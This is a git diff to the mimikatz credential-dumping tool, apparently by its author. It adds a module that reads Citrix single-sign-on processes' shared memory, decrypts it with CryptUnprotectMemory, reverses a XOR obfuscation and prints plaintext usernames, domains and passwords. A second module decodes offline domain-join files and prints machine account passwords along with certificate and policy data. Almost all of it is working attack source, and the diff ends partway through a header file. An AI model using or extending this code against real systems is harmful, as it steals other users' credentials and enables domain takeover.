diff --git a/inc/globals.h b/inc/globals.h index d3aa24a..b124b88 100755 --- a/inc/globals.h +++ b/inc/globals.h @@ -129,3 +129,18 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU #define KULL_M_WIN_MIN_BUILD_BLUE 9400 #define KULL_M_WIN_MIN_BUILD_10 9800 #define KULL_M_WIN_MIN_BUILD_11 22000 + +/* mimikatz 3 transition */ +#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL)) +#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def)) +#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL)) + +#define kprintf_level(subject, ...) kprintf(L"%*s" subject, level << 1, L"", __VA_ARGS__) + +#define kprinthex(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 0); kprintf(L"\n") +#define kprinthex16(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 1 | (16 << 16)); kprintf(L"\n") + +#define kull_m_cli_guid(pGuid, bNewLine) kull_m_string_displayGUID(pGuid); if(bNewLine) kprintf(L"\n") +#define kull_m_cli_sid(pSid, bNewLine) kull_m_string_displaySID(pSid); if(bNewLine) kprintf(L"\n") + +#define kull_m_crypto_Base64StringToBinary kull_m_string_quick_base64_to_Binary \ No newline at end of file diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj index 1fff23d..b5d29f7 100644 --- a/mimikatz/mimikatz.vcxproj +++ b/mimikatz/mimikatz.vcxproj @@ -153,6 +153,7 @@ + @@ -213,6 +214,8 @@ + + @@ -273,6 +276,7 @@ + @@ -331,6 +335,8 @@ + + diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters index 0551987..ea22f09 100644 --- a/mimikatz/mimikatz.vcxproj.filters +++ b/mimikatz/mimikatz.vcxproj.filters @@ -332,6 +332,15 @@ local modules\dpapi\packages + + common modules\rpc + + + local modules\misc + + + local modules\misc + @@ -683,6 +692,15 @@ local modules\dpapi\packages + + common modules\rpc + + + local modules\misc + + + local modules\misc + @@ -723,6 +741,9 @@ {5880e511-0496-4c66-95c3-39c70baac28b} + + {ca3b8b78-3db9-40c8-8091-438a90e5be4e} + diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c index 49b4a8a..60c6f89 100644 --- a/mimikatz/modules/kuhl_m_misc.c +++ b/mimikatz/modules/kuhl_m_misc.c @@ -30,8 +30,10 @@ const KUHL_M_C kuhl_m_c_misc[] = { {kuhl_m_misc_spooler, L"spooler", NULL}, {kuhl_m_misc_efs, L"efs", NULL}, {kuhl_m_misc_printnightmare, L"printnightmare", NULL}, - {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, - {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL}, + {kuhl_m_misc_sccm_accounts, L"sccm", NULL}, + {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL}, + {kuhl_m_misc_djoin_proxy, L"djoin", NULL}, + {kuhl_m_misc_citrix_proxy, L"citrix", NULL}, }; const KUHL_M kuhl_m_misc = { L"misc", L"Miscellaneous module", NULL, @@ -2183,5 +2185,17 @@ NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]) } else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status); + return STATUS_SUCCESS; +} + +NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[]) +{ + kuhl_m_misc_djoin(argc, argv); + return STATUS_SUCCESS; +} + +NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[]) +{ + kuhl_m_misc_citrix_logonpasswords(argc, argv); return STATUS_SUCCESS; } \ No newline at end of file diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h index 13b9604..8fd31e4 100644 --- a/mimikatz/modules/kuhl_m_misc.h +++ b/mimikatz/modules/kuhl_m_misc.h @@ -23,6 +23,8 @@ #include #pragma warning(pop) #include +#include "misc/kuhl_m_misc_djoin.h" +#include "misc/kuhl_m_misc_citrix.h" const KUHL_M kuhl_m_misc; @@ -50,6 +52,8 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]); NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]); +NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[]); +NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[]); BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary); BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding); diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.c b/mimikatz/modules/misc/kuhl_m_misc_citrix.c new file mode 100644 index 0000000..6041d24 --- /dev/null +++ b/mimikatz/modules/misc/kuhl_m_misc_citrix.c @@ -0,0 +1,168 @@ +/* Benjamin DELPY `gentilkiwi` + https://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : https://creativecommons.org/licenses/by/4.0/ +*/ +#include "kuhl_m_misc_citrix.h" + +void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]) +{ + UNREFERENCED_PARAMETER(argc); + UNREFERENCED_PARAMETER(argv); + + kull_m_process_getProcessInformation(Citrix_Each_SSO_Program, NULL); +} + +DECLARE_CONST_UNICODE_STRING(_U_ssonsvr, L"ssonsvr.exe"); +DECLARE_CONST_UNICODE_STRING(_U_wfcrun32, L"wfcrun32.exe"); +DECLARE_CONST_UNICODE_STRING(_U_AuthManSvr, L"AuthManSvr.exe"); +const PCUNICODE_STRING _U_CITRIX_SSO_PROGRAMS[] = { &_U_ssonsvr , &_U_wfcrun32 , &_U_AuthManSvr }; +BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg) +{ + DWORD i, ProcessId; + HANDLE hProcess; + //PKULL_M_MEMORY_HANDLE hMemory; + //KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory }; + RTL_USER_PROCESS_PARAMETERS UserProcessParameters; + KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; + PEB Peb; + + + UNREFERENCED_PARAMETER(pvArg); + + for (i = 0; i < ARRAYSIZE(_U_CITRIX_SSO_PROGRAMS); i++) + { + if (RtlEqualUnicodeString(_U_CITRIX_SSO_PROGRAMS[i], &pSystemProcessInformation->ImageName, TRUE)) + { + ProcessId = PtrToUlong(pSystemProcessInformation->UniqueProcessId); + kprintf(L"\n* %wZ -- pid: %u\n", &pSystemProcessInformation->ImageName, ProcessId); + hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, FALSE, ProcessId); + if(hProcess) + { + if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory)) + { + if (kull_m_process_peb(aRemote.hMemory, &Peb, FALSE)) + { + aRemote.address = Peb.ProcessParameters; + if (kull_m_memory_copy(&aBuffer, &aRemote, sizeof(UserProcessParameters))) + { + aRemote.address = UserProcessParameters.CommandLine.Buffer; + UserProcessParameters.CommandLine.Buffer = LocalAlloc(LPTR, UserProcessParameters.CommandLine.MaximumLength); + aBuffer.address = UserProcessParameters.CommandLine.Buffer; + + if(UserProcessParameters.CommandLine.Buffer) + { + if (kull_m_memory_copy(&aBuffer, &aRemote, UserProcessParameters.CommandLine.MaximumLength)) + { + Citrix_SSO_Program_args(aRemote.hMemory->pHandleProcess->hProcess, &UserProcessParameters.CommandLine); + } + LocalFree(UserProcessParameters.CommandLine.Buffer); + } + } + } + kull_m_memory_close(aRemote.hMemory); + } + CloseHandle(hProcess); + } + else PRINT_ERROR_AUTO(L"OpenProcess"); + + break; + } + } + + return TRUE; +} + +void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine) +{ + int i, argc; + LPWSTR* argv; + HANDLE hRemoteFileMapping = NULL; + + argv = CommandLineToArgvW(puCommandLine->Buffer, &argc); + if (argv) + { + if (argc > 0) + { + for (i = 0; i < argc; i++) + { + if (_wcsnicmp(argv[i], L"/HTC:", 5) == 0) + { + hRemoteFileMapping = (HANDLE)(ULONG_PTR)wcstoul(argv[i] + 5, NULL, 10); + Citrix_SSO_Program_FileMapping(hRemoteProcess, hRemoteFileMapping); + + break; + } + } + + if (!hRemoteFileMapping) + { + kprintf(L" No shared memory (no SSO enabled?)\n"); + } + } + else PRINT_ERROR(L"No command/module?"); + + LocalFree(argv); + } + else PRINT_ERROR_AUTO(L"CommandLineToArgvW"); +} + +void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping) +{ + HANDLE hFileMapping; + PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials; + PCITRIX_CREDENTIALS pCitrixCredentials; + + if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0)) + { + pCitrixPackedCredentials = MapViewOfFile(hFileMapping, FILE_MAP_READ, 0, 0, sizeof(CITRIX_PACKED_CREDENTIALS)); + if (pCitrixPackedCredentials) + { + //kprintf(L"cbStruct: 0x%08x - ref: 0x%08x\ncbData : 0x%08x - ref: 0x%08x\ndwFlags : 0x%08x\n", pCitrixPackedCredentials->cbStruct, sizeof(CITRIX_PACKED_CREDENTIALS), pCitrixPackedCredentials->cbData, sizeof(CITRIX_CREDENTIALS), pCitrixPackedCredentials->dwFlags); + pCitrixCredentials = LocalAlloc(LPTR, sizeof(pCitrixPackedCredentials->Data)); + if (pCitrixCredentials) + { + RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data)); + if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS)) + { + CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword); + kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags); + } + else PRINT_ERROR_AUTO(L"CryptUnprotectMemory"); + + LocalFree(pCitrixCredentials); + } + + UnmapViewOfFile(pCitrixPackedCredentials); + } + else PRINT_ERROR_AUTO(L"MapViewOfFile"); + + CloseHandle(hFileMapping); + } + else PRINT_ERROR_AUTO(L"DuplicateHandle"); +} + +void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData) +{ + DWORD i; + BYTE prec; + + for (i = 0, prec = 0x00; i < cbData; i++) + { + pbData[i] ^= prec ^ 'C'; + prec = pbData[i]; + } +} + +void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData) +{ + DWORD i; + BYTE prec, sprec; + + for (i = 0, prec = 0x00; i < cbData; i++) + { + sprec = pbData[i]; + pbData[i] ^= prec ^ 'C'; + prec = sprec; + } +} \ No newline at end of file diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.h b/mimikatz/modules/misc/kuhl_m_misc_citrix.h new file mode 100644 index 0000000..28b5d0e --- /dev/null +++ b/mimikatz/modules/misc/kuhl_m_misc_citrix.h @@ -0,0 +1,37 @@ +/* Benjamin DELPY `gentilkiwi` + https://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : https://creativecommons.org/licenses/by/4.0/ +*/ +#pragma once +#include "../kuhl_m_misc.h" +#include "../../../modules/kull_m_memory.h" +#include "../../../modules/kull_m_process.h" + +extern const KUHL_M kuhl_m_misc_citrix; + +#pragma pack(push, 4) +typedef struct _CITRIX_CREDENTIALS { + wchar_t username[0x100]; + wchar_t domain[0x100]; + DWORD cbPassword; + wchar_t password[0x100]; + DWORD dwFlags; // type ? +} CITRIX_CREDENTIALS, * PCITRIX_CREDENTIALS; + +typedef struct _CITRIX_PACKED_CREDENTIALS { + DWORD cbStruct; + DWORD cbData; + DWORD dwFlags; + BYTE Data[SIZE_ALIGN(sizeof(CITRIX_CREDENTIALS), CRYPTPROTECTMEMORY_BLOCK_SIZE)]; +} CITRIX_PACKED_CREDENTIALS, * PCITRIX_PACKED_CREDENTIALS; +#pragma pack(pop) + +void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]); + +BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg); +void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine); +void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping); + +void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData); +void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData); \ No newline at end of file diff --git a/mimikatz/modules/misc/kuhl_m_misc_djoin.c b/mimikatz/modules/misc/kuhl_m_misc_djoin.c new file mode 100644 index 0000000..7e14e29 --- /dev/null +++ b/mimikatz/modules/misc/kuhl_m_misc_djoin.c @@ -0,0 +1,363 @@ +/* Benjamin DELPY `gentilkiwi` + https://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : https://creativecommons.org/licenses/by/4.0/ +*/ +#include "kuhl_m_misc_djoin.h" + +void kuhl_m_misc_djoin(int argc, wchar_t* argv[]) +{ + LPCWSTR szInput; + PBYTE pbData, pbDecodedData; + DWORD cbData, cbDecodedData; + + if (GET_CLI_ARG(L"input", &szInput)) + { + kprintf(L"Input : %s\nOpening : ", szInput); + if (kull_m_file_readData(szInput, &pbData, &cbData)) + { + kprintf(L"OK\nDecoding: "); + if (kull_m_crypto_Base64StringToBinary((LPCWSTR)pbData, &pbDecodedData, &cbDecodedData)) + { + kprintf(L"OK\n\n"); + kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(0, cbDecodedData, pbDecodedData); + LocalFree(pbDecodedData); + } + LocalFree(pbData); + } + } + else PRINT_ERROR(L"An /input:file is needed\n"); +} + +void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + PODJ_PROVISION_DATA pOdjProvisionData = NULL; + DWORD i; + + kprintf_level(L"[ODJ_PROVISION_DATA]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeODJ_PROVISION_DATA(pBlob, cbBlob, &pOdjProvisionData)) + { + level++; + kprintf_level(L"ulVersion: %u\n", pOdjProvisionData->ulVersion); + kprintf_level(L"ulcBlobs : %u\n", pOdjProvisionData->ulcBlobs); + + for (i = 0; i < pOdjProvisionData->ulcBlobs; i++) + { + kprintf_level(L"[%u] Blob - ulODJFormat: %u (", i, pOdjProvisionData->pBlobs[i].ulODJFormat); + switch (pOdjProvisionData->pBlobs[i].ulODJFormat) + { + case ODJ_WIN7_FORMAT: + kprintf(L"windows 7)\n"); + kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob); + break; + + case ODJ_WIN8_FORMAT: + kprintf(L"windows 8)\n"); + kuhl_m_misc_djoin_OP_PACKAGE_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob); + break; + default: + kprintf(L"?)\n"); + kprinthex16(pOdjProvisionData->pBlobs[i].pBlob, pOdjProvisionData->pBlobs[i].cbBlob); + } + } + + kull_m_rpc_FreeODJ_PROVISION_DATA(&pOdjProvisionData); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + PODJ_WIN7BLOB pOdjWin7Blob = NULL; + + kprintf_level(L"[ODJ_WIN7BLOB]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeODJ_WIN7BLOB(pBlob, cbBlob, &pOdjWin7Blob)) + { + level++; + kprintf_level(L"lpDomain : %s\n", pOdjWin7Blob->lpDomain); + kprintf_level(L"lpMachineName : %s\n", pOdjWin7Blob->lpMachineName); + kprintf_level(L"lpMachinePassword: %s\n", pOdjWin7Blob->lpMachinePassword); + kprintf_level(L"DnsDomainInfo\n"); + kprintf_level(L" Name : %wZ\n", &pOdjWin7Blob->DnsDomainInfo.Name); + kprintf_level(L" DnsDomainName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsDomainName); + kprintf_level(L" DnsForestName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsForestName); + kprintf_level(L" DomainGuid : "); + kull_m_cli_guid(&pOdjWin7Blob->DnsDomainInfo.DomainGuid, TRUE); + kprintf_level(L" Sid : "); + kull_m_cli_sid(pOdjWin7Blob->DnsDomainInfo.Sid, TRUE); + kprintf_level(L"DcInfo\n"); + kprintf_level(L" DomainControllerName : %s\n", pOdjWin7Blob->DcInfo.DomainControllerName); + kprintf_level(L" DomainControllerAddress: %s (DomainControllerAddressType: %u)\n", pOdjWin7Blob->DcInfo.DomainControllerAddress, pOdjWin7Blob->DcInfo.DomainControllerAddressType); + kprintf_level(L" DomainGuid : "); + kull_m_cli_guid(&pOdjWin7Blob->DcInfo.DomainGuid, TRUE); + kprintf_level(L" DomainName : %s\n", pOdjWin7Blob->DcInfo.DomainName); + kprintf_level(L" ForestName : %s\n", pOdjWin7Blob->DcInfo.DnsForestName); + kprintf_level(L" Flags : 0x%08x\n", pOdjWin7Blob->DcInfo.Flags); + kprintf_level(L" DcSiteName : %s\n", pOdjWin7Blob->DcInfo.DcSiteName); + kprintf_level(L" ClientSiteName : %s\n", pOdjWin7Blob->DcInfo.ClientSiteName); + kprintf_level(L"Options : 0x%08x\n", pOdjWin7Blob->Options); + + kull_m_rpc_FreeODJ_WIN7BLOB(&pOdjWin7Blob); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_PACKAGE pOpPackage = NULL; + + kprintf_level(L"[OP_PACKAGE]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_PACKAGE(pBlob, cbBlob, &pOpPackage)) + { + level++; + kprintf_level(L"EncryptionType : "); + kull_m_cli_guid(&pOpPackage->EncryptionType, TRUE); + kprintf_level(L"EncryptionContext : 0x%p (%u)\n", pOpPackage->EncryptionContext.pBlob, pOpPackage->EncryptionContext.cbBlob); + kprintf_level(L"WrappedPartCollection :\n"); + kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(level + 1, pOpPackage->WrappedPartCollection.cbBlob, pOpPackage->WrappedPartCollection.pBlob); + kprintf_level(L"cbDecryptedPartCollection: %u\n", pOpPackage->cbDecryptedPartCollection); + kprintf_level(L"Extension : 0x%p (%u)\n", pOpPackage->Extension.pBlob, pOpPackage->Extension.cbBlob); + + kull_m_rpc_FreeOP_PACKAGE(&pOpPackage); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_PACKAGE_PART_COLLECTION pOpPackagePartCollection = NULL; + DWORD i; + + kprintf_level(L"[OP_PACKAGE_PART_COLLECTION]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(pBlob, cbBlob, &pOpPackagePartCollection)) + { + level++; + kprintf_level(L"cParts : %u\n", pOpPackagePartCollection->cParts); + for (i = 0; i < pOpPackagePartCollection->cParts; i++) + { + kprintf_level(L"[%u] Blob\n", i); + kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(level + 1, pOpPackagePartCollection->pParts + i); + } + kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePartCollection->Extension.pBlob, pOpPackagePartCollection->Extension.cbBlob); + + kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(&pOpPackagePartCollection); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart) +{ + kprintf_level(L"[OP_PACKAGE_PART]\n"); + level++; + kprintf_level(L"PartType : "); + kull_m_cli_guid(&pOpPackagePart->PartType, FALSE); + + if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER)) + { + kprintf(L" - JOIN_PROVIDER\n"); + kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob); + } + else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER2)) + { + kprintf(L" - JOIN_PROVIDER2\n"); + kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob); + } + else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER3)) + { + kprintf(L" - JOIN_PROVIDER3\n"); + kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob); + } + else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_CERT_PROVIDER)) + { + kprintf(L" - CERT_PROVIDER\n"); + kuhl_m_misc_djoin_OP_CERT_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob); + } + else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_POLICY_PROVIDER)) + { + kprintf(L" - POLICY_PROVIDER\n"); + kuhl_m_misc_djoin_OP_POLICY_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob); + } + else + { + kprintf(L" - ?\n"); + kprinthex16(pOpPackagePart->Part.pBlob, pOpPackagePart->Part.cbBlob); + } + + kprintf_level(L"ulFlags : 0x%08x\n", pOpPackagePart->ulFlags); + kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePart->Extension.pBlob, pOpPackagePart->Extension.cbBlob); +} + +void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_JOINPROV2_PART pOpJoinProv2Part = NULL; + + kprintf_level(L"[OP_JOINPROV2_PART]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_JOINPROV2_PART(pBlob, cbBlob, &pOpJoinProv2Part)) + { + level++; + kprintf_level(L"dwFlags : 0x%08x\n", pOpJoinProv2Part->dwFlags); + kprintf_level(L"lpNetbiosName : %s\n", pOpJoinProv2Part->lpNetbiosName); + kprintf_level(L"lpSiteName : %s\n", pOpJoinProv2Part->lpSiteName); + kprintf_level(L"lpPrimaryDNSDomain: %s\n", pOpJoinProv2Part->lpPrimaryDNSDomain); + kprintf_level(L"dwReserved : 0x%08x\n", pOpJoinProv2Part->dwReserved); + kprintf_level(L"lpReserved : %s\n", pOpJoinProv2Part->lpReserved); + + kull_m_rpc_FreeOP_JOINPROV2_PART(&pOpJoinProv2Part); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_JOINPROV3_PART pOpJoinProv3Part = NULL; + + kprintf_level(L"[OP_JOINPROV3_PART]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_JOINPROV3_PART(pBlob, cbBlob, &pOpJoinProv3Part)) + { + level++; + kprintf_level(L"Rid : %u\n", pOpJoinProv3Part->Rid); + kprintf_level(L"lpSid: %s\n", pOpJoinProv3Part->lpSid); + + kull_m_rpc_FreeOP_JOINPROV3_PART(&pOpJoinProv3Part); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_CERT_PART pOpCertPart = NULL; + DWORD i; + + kprintf_level(L"[OP_CERT_PART]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_CERT_PART(pBlob, cbBlob, &pOpCertPart)) + { + level++; + kprintf_level(L"cPfxStores: %u\n", pOpCertPart->cPfxStores); + for (i = 0; i < pOpCertPart->cPfxStores; i++) + { + kprintf_level(L"[%u] PfxStore\n", i); + kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(level + 1, pOpCertPart->pPfxStores + i); + } + kprintf_level(L"cSstStores: %u\n", pOpCertPart->cSstStores); + for (i = 0; i < pOpCertPart->cSstStores; i++) + { + kprintf_level(L"[%u] SstStore\n", i); + kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(level + 1, pOpCertPart->pSstStores + i); + } + kprintf_level(L"Extension: 0x%p (%u)\n", pOpCertPart->Extension.pBlob, pOpCertPart->Extension.cbBlob); + + kull_m_rpc_FreeOP_CERT_PART(&pOpCertPart); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore) +{ + kprintf_level(L"[OP_CERT_PFX_STORE]\n"); + level++; + kprintf_level(L"pTemplateName : %s\n", pPfxStore->pTemplateName); + kprintf_level(L"ulPrivateKeyExportPolicy: 0x%08x\n", pPfxStore->ulPrivateKeyExportPolicy); + kprintf_level(L"pPolicyServerUrl : %s\n", pPfxStore->pPolicyServerUrl); + kprintf_level(L"ulPolicyServerUrlFlags : 0x%08x\n", pPfxStore->ulPolicyServerUrlFlags); + kprintf_level(L"pPolicyServerId : %s\n", pPfxStore->pPolicyServerId); + kprintf_level(L"pfx : %p (%u)\n", pPfxStore->pPfx, pPfxStore->cbPfx); +} + +void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore) +{ + kprintf_level(L"[OP_CERT_SST_STORE]\n"); + level++; + kprintf_level(L"StoreLocation: 0x%08x (%s)\n", pSstStore->StoreLocation, kull_m_crypto_system_store_to_name(pSstStore->StoreLocation)); + kprintf_level(L"pStoreName : %s\n", pSstStore->pStoreName); + kprintf_level(L"sst : %p (%u)\n", pSstStore->pSst, pSstStore->cbSst); +} + +void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob) +{ + POP_POLICY_PART pOpPolicyPart = NULL; + DWORD i; + + kprintf_level(L"[OP_POLICY_PART]"); + if (cbBlob && pBlob) + { + kprintf(L"\n"); + if (kull_m_rpc_DecodeOP_POLICY_PART(pBlob, cbBlob, &pOpPolicyPart)) + { + level++; + kprintf_level(L"cElementLists: %u\n", pOpPolicyPart->cElementLists); + for (i = 0; i < pOpPolicyPart->cElementLists; i++) + { + kprintf_level(L"[%u] ElementsList\n", i); + kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(level + 1, pOpPolicyPart->pElementLists + i); + } + kprintf_level(L"Extension : 0x%p (%u)\n", pOpPolicyPart->Extension.pBlob, pOpPolicyPart->Extension.cbBlob); + kull_m_rpc_FreeOP_POLICY_PART(&pOpPolicyPart); + } + } + else kprintf(L" \n"); +} + +void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(DWORD level, POP_POLICY_ELEMENT_LIST pElementList) +{ + DWORD i; + + kprintf_level(L"[OP_POLICY_ELEMENT_LIST]\n"); + level++; + kprintf_level(L"pSource : %s\n", pElementList->pSource); + kprintf_level(L"ulRootKeyId: 0x%08x\n", pElementList->ulRootKeyId); + kprintf_level(L"cElements : %u\n", pElementList->cElements); + for (i = 0; i < pElementList->cElements; i++) + { + kprintf_level(L"[%u] Element\n", i); + kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(level + 1, pElementList->pElements + i); + } +} + +void kuhl_m_misc_djoin_OP_POLICY_ELEMENT_descr(DWORD level, POP_POLICY_ELEMENT pElement) +{ + kprintf_level(L"[OP_POLICY_ELEMENT]\n"); + level++; + kprintf_level(L"pKeyPath : %s\n", pElement->pKeyPath); + kprintf_level(L"pValueName : %s\n", pElement->pValueName); + kprintf_level(L"ulValueType: 0x%08x\n", pElement->ulValueType); + kprintf_level(L"value : "); + switch (pElement->ulValueType) + { + case REG_SZ: + kprintf(L"%s\n", pElement->pValueData); + break; + + case REG_BINARY: + default: + kprintf(L"%p (%u)\n", pElement->pValueData, pElement->cbValueData); + //kprinthex16(pElement->pValueData, pElement->cbValueData); + } +} \ No newline at end of file diff --git a/mimikatz/modules/misc/kuhl_m_misc_djoin.h b/mimikatz/modules/misc/kuhl_m_misc_djoin.h new file mode 100644 index 0000000..b8e46a5 --- /dev/null +++ b/mimikatz/modules/misc/kuhl_m_misc_djoin.h @@ -0,0 +1,29 @@ +/* Benjamin DELPY `gentilkiwi` + https://blog.gentilkiwi.com + benjamin@gentilkiwi.com + Licence : https://creativecommons.org/licenses/by/4.0/ +*/ +#pragma once +#include 